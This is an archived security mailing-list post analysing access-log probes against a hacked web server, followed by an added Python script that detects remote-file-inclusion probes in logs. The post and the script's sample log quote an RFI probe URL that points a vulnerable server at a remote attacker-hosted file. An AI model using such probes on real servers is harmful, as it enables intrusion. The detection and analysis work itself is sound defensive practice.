[nsp-sec] Some malware on a Web server of ours
Rob Thomas
robt at cymru.com
Wed Feb 11 17:11:30 EST 2009
Hey, Joel.
Sorry to hear about the hack and malware.
> 189.129.97.12 - - [05/Feb/2009:22:12:14 -0500] "GET
> /FX/Developer/PHPCACHE/php5.php HTTP/1.1" 200 1424
Someone at 189.129.97.12 spent some quality time telnet'd into a Linux
box at 220.182.54.89 about 45 minutes after hitting you. Might not be
related, but I thought I'd share it just in case.
> 62.193.13.163 - - [05/Feb/2009:22:32:10 -0500] "GET
> /FX/Databases/store/safeon.txt?? HTTP/1.1" 200 656
This appears to be a Linux box and Squid 2.6 STABLE14 proxy. The hosts
using this Squid proxy also appear to be Linux boxes.
> 84.38.64.218 - - [05/Feb/2009:22:54:14 -0500] "GET
> /FX/Databases/store/safeon.txt?? HTTP/1.1" 200 656
This appears to be a Windows XP host. It also appears to be a web
server with a few DNS RRs pointed to it.
timestamp            | dns_name          | ip
---------------------|-------------------|---------------
2009-02-08 21:35:19  | glas-blog.de      | 84.38.64.218
2009-02-08 22:50:54  | www.glas-blog.de  | 84.38.64.218
2009-01-15 09:05:18  | pyratz.com        | 84.38.64.218
2009-01-20 17:35:51  | www.pyratz.eu     | 84.38.64.218
So why is the web server piece interesting? Because someone appears to
have been testing for similar malware through this web server, or
probing it for XSS, or just messing around. The URL was:
hxxp://www.pyratz.eu//forum.php?act=http://people34.fr/gang11/test.txt??
Thanks,
Rob.
--
Rob Thomas
Team Cymru
http://www.team-cymru.org/
cmn_err(CEO_PANIC, "Out of coffee!");
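The requests quoted in this thread share two traits an analyst can key on when sweeping their own access logs: a query parameter whose value is itself a remote URL (the `forum.php?act=http://...` probe) and a request target ending in `??`, which every probe above carries. The script below is an added example written for this page, not code from Rob Thomas or Team Cymru. It parses Apache common-log-format lines and flags requests showing either trait. The sample log is constructed: the first three lines are the post's quoted hits rejoined onto single lines, the benign `/index.html` line is made up, and the pyratz.eu probe is rewritten as a log line with a placeholder client address (198.51.100.7), since the post does not say which host sent it.

```python
import re

# Apache common/combined log prefix: client ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Constructed sample log (see lead-in): three lines quoted in the post, one benign
# line, and the pyratz.eu probe with a placeholder client IP.
SAMPLE_LOG = """\
189.129.97.12 - - [05/Feb/2009:22:12:14 -0500] "GET /FX/Developer/PHPCACHE/php5.php HTTP/1.1" 200 1424
62.193.13.163 - - [05/Feb/2009:22:32:10 -0500] "GET /FX/Databases/store/safeon.txt?? HTTP/1.1" 200 656
84.38.64.218 - - [05/Feb/2009:22:54:14 -0500] "GET /FX/Databases/store/safeon.txt?? HTTP/1.1" 200 656
192.0.2.10 - - [05/Feb/2009:23:00:00 -0500] "GET /index.html HTTP/1.1" 200 512
198.51.100.7 - - [05/Feb/2009:23:05:41 -0500] "GET //forum.php?act=http://people34.fr/gang11/test.txt?? HTTP/1.1" 200 2048
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def split_query(query):
    """Split a raw query string into (key, value) pairs without URL-decoding.
    Chunks with no '=' are kept (value '') so odd trailers such as a bare '?'
    remain visible to the caller."""
    pairs = []
    for chunk in query.split("&"):
        if not chunk:
            continue
        key, _, value = chunk.partition("=")
        pairs.append((key, value))
    return pairs


def rfi_indicators(target):
    """Return the reasons a request target looks like an include-URL probe."""
    reasons = []
    # Split only on the first '?' so a second '?' stays inside the parameter value.
    _path, _, query = target.partition("?")
    for key, value in split_query(query):
        if value.lower().startswith(REMOTE_SCHEMES):
            reasons.append(f"parameter {key!r} points at a remote URL ({value})")
    if target.endswith("??"):
        reasons.append("request target ends in '??'")
    return reasons


def scan(log_text):
    """Run the indicators over every parsable line; return the flagged records."""
    flagged = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = rfi_indicators(rec["target"])
        if reasons:
            flagged.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "target": rec["target"],
                "status": rec["status"],   # 200 means the server actually served it
                "reasons": reasons,
            })
    return flagged


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ip']:>15} {hit['status']} {hit['target']}")
        for reason in hit["reasons"]:
            print(f"{'':>15}   - {reason}")
```

The status code is carried through on purpose: a flagged fetch that returned 200, as the `safeon.txt` hits above did, tells you the file was really present on the server, which is a different cleanup job from a 404 on a probe that never landed.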